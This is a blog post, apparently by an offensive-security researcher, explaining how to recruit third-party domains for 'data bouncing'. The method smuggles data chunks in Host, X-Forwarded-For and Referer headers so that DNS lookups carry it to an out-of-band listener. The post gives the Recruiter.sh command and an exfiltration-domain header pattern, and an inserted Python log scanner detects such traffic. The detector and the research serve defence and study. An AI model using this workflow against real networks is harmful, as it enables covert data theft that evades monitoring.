Identifying Candidates
This post covers one way of identifying data bouncing candidates. After all, you'll need a list of available and capable domains to use; here's how you get them...
If you're not watching the video above (and you should watch it), you can get stuck in with the items below. The Recruiter script lets you set an out-of-band (OOB) domain and your potential target file (such as a list of 1000 or 1000000 high reputation domains); it then fires off a request to each domain, padded with a collection of additional headers that tell your listener the origin (the domain) and the position (Host, X-Forwarded-For, Referer etc...). For listeners there are a few options: the quick option is the interactsh service, available to all at the link below, although for committed efforts I'd recommend setting up your own interactsh server. For light work you might get away with Burp's Collaborator, but for manageability I'd reach for Taborator; if you get too much, though... Burp has a reputation... you know.
Recruiter.sh - get them lookups, the origin and position
Once downloaded, the script takes two flags, which you can set in the script itself or pass as arguments:
./Recruiter.sh -o "your-custom-oob-domain.com" -d "customdomains.txt"
Don't forget to chmod +x Recruiter.sh to make it executable.
Download the script here: https://gist.github.com/yosignals/7329d6863d7804ec8b1eb43636d691a3
Interactsh - Listen and collect
If you do not want to use Burp's Collaborator (ideal for small pieces of work), Project Discovery's Interactsh system is reliable, either on their own hosted server at https://app.interactsh.com/#/ or, if you're more polite, on your own self-hosted instance. Either way, it will give you your custom OOB domain.
Target Lists - Stuff to be sent
This is really up to you, but there are a few places that host the top N hosts on the internet. Here's what we used for this video: https://dataforseo.com/free-seo-stats/top-1000-websites
Cygenta's List
FC has an excellent corpus here https://www.cygenta.co.uk/post/10-million
If you want to go ballistic
Bohdan has an amazing project; there is a free older dataset on GitHub, but give the man some money to cover the overhead and effort of cutting out fresh data, big data*.
https://domainsproject.org
*Good data to have for silent enumeration
When you're done with your recruitment, you'll be left with a collection of usable targets and their position. We prepend the position to the domain we sent it to, so when we receive lookups the position is in a subdomain, which is easier for sorting.
So if we have host.google.com, xff.apple.com, ref.microsoft.com etc..., this means that when we are sending the data, the bouncer script will read that as position and domain, so it takes one of its chunks, adds it to the position and fires it off to the domain.
google.com would get a piece in its Host header, so the Host header would be chunk of data.and.metadata.exfiltrationdomain.co.uk; Apple's would be in the X-Forwarded-For, Microsoft's in its Referer header, and so on and so forth, becoming more elusive.
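As an added example that is not part of this post or the Recruiter/bouncer scripts, here is a Python check a defender on the receiving side of these requests could run over web-tier access logs. It flags three things the Recruiter and bouncer traffic above relies on: a Host value that is not a hostname the property serves, a hostname sitting in X-Forwarded-For where only IP addresses belong, and an encoded-looking Referer name (deep label stacks or long labels). Hits are grouped by their trailing labels so the shared listener domain stands out. The JSON-lines log format, the served-host list and the oob.example.net listener domain are all constructed for this example.

```python
"""Flag client-controlled header values that carry DNS names our stack might
resolve although they are not ours (Host / X-Forwarded-For / Referer).
Sample log lines and served hosts are constructed for the example."""
import json
import re
from urllib.parse import urlsplit

# Hostnames this web property legitimately serves (assumption for the example).
OUR_HOSTS = {"example.com", "www.example.com", "api.example.com"}

IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
LABEL = re.compile(r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$", re.I)


def is_hostname(value):
    """True if value is syntactically a DNS name a resolver would look up."""
    labels = value.rstrip(".").split(".")
    return 2 <= len(labels) and len(value) <= 253 and all(LABEL.match(l) for l in labels)


def looks_encoded(host):
    """Heuristic for data-bearing names: five or more labels, or a long label."""
    labels = host.rstrip(".").lower().split(".")
    return len(labels) >= 5 or max(len(l) for l in labels) >= 24


def foreign_names(headers):
    """Return (header, name, reason) triples for names we did not put there."""
    findings = []
    # Host: anything not in our vhost list is foreign (scanner noise included).
    host = headers.get("host", "").split(":")[0].strip().lower()
    if host and host not in OUR_HOSTS and is_hostname(host):
        findings.append(("Host", host, "not a hostname we serve"))
    # X-Forwarded-For should only ever hold IP addresses.
    for entry in headers.get("x-forwarded-for", "").split(","):
        entry = entry.strip().lower()
        if entry and not IPV4.match(entry) and ":" not in entry and is_hostname(entry):
            findings.append(("X-Forwarded-For", entry, "hostname where only IPs belong"))
    # Referer: external sites are normal, so only flag encoded-looking names.
    ref = headers.get("referer", "")
    ref_host = (urlsplit(ref).hostname or "").lower() if ref else ""
    if ref_host and ref_host not in OUR_HOSTS and is_hostname(ref_host) and looks_encoded(ref_host):
        findings.append(("Referer", ref_host, "encoded-looking external name"))
    return findings


# Constructed JSON-lines access log: one clean line, three bounce-style lines,
# one ordinary external referer that must not alert.
SAMPLE_LOG = """\
{"src":"198.51.100.5","host":"www.example.com","x-forwarded-for":"198.51.100.5","referer":"https://www.example.com/"}
{"src":"198.51.100.9","host":"ab12cd34ef56.host.example.com.oob.example.net","x-forwarded-for":"198.51.100.9","referer":""}
{"src":"198.51.100.12","host":"www.example.com","x-forwarded-for":"9f8e7d6c5b4a.xff.example.com.oob.example.net, 198.51.100.12","referer":""}
{"src":"198.51.100.20","host":"www.example.com","x-forwarded-for":"198.51.100.20","referer":"https://a1b2c3d4e5f6a7b8c9d0e1f2.ref.example.com.oob.example.net/"}
{"src":"198.51.100.31","host":"www.example.com","x-forwarded-for":"198.51.100.31","referer":"https://news.example.org/story"}
"""


def scan(log_text):
    """Parse the JSON-lines log and return one alert dict per foreign name.
    'suffix' is the name's last three labels, the pivot for spotting a shared
    listener domain across many sources."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        for header, name, reason in foreign_names(rec):
            alerts.append({
                "src": rec["src"],
                "header": header,
                "name": name,
                "reason": reason,
                "suffix": ".".join(name.split(".")[-3:]),
            })
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The log check is the detection half; the control that actually matters is that nothing in the web tier resolves client-supplied names at all (reverse-proxy hostname logging, Referer fetching, DNS-based allow-lists keyed on Host), since a name that is never looked up never reaches the listener. Egress DNS logs from the web tier are the other place the same trailing-label pivot applies.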
The script allows for proxies too; if you want a closer look, push it through your proxy or Wireshark and you'll see a common theme that will frustrate defense and put a smile on offsec.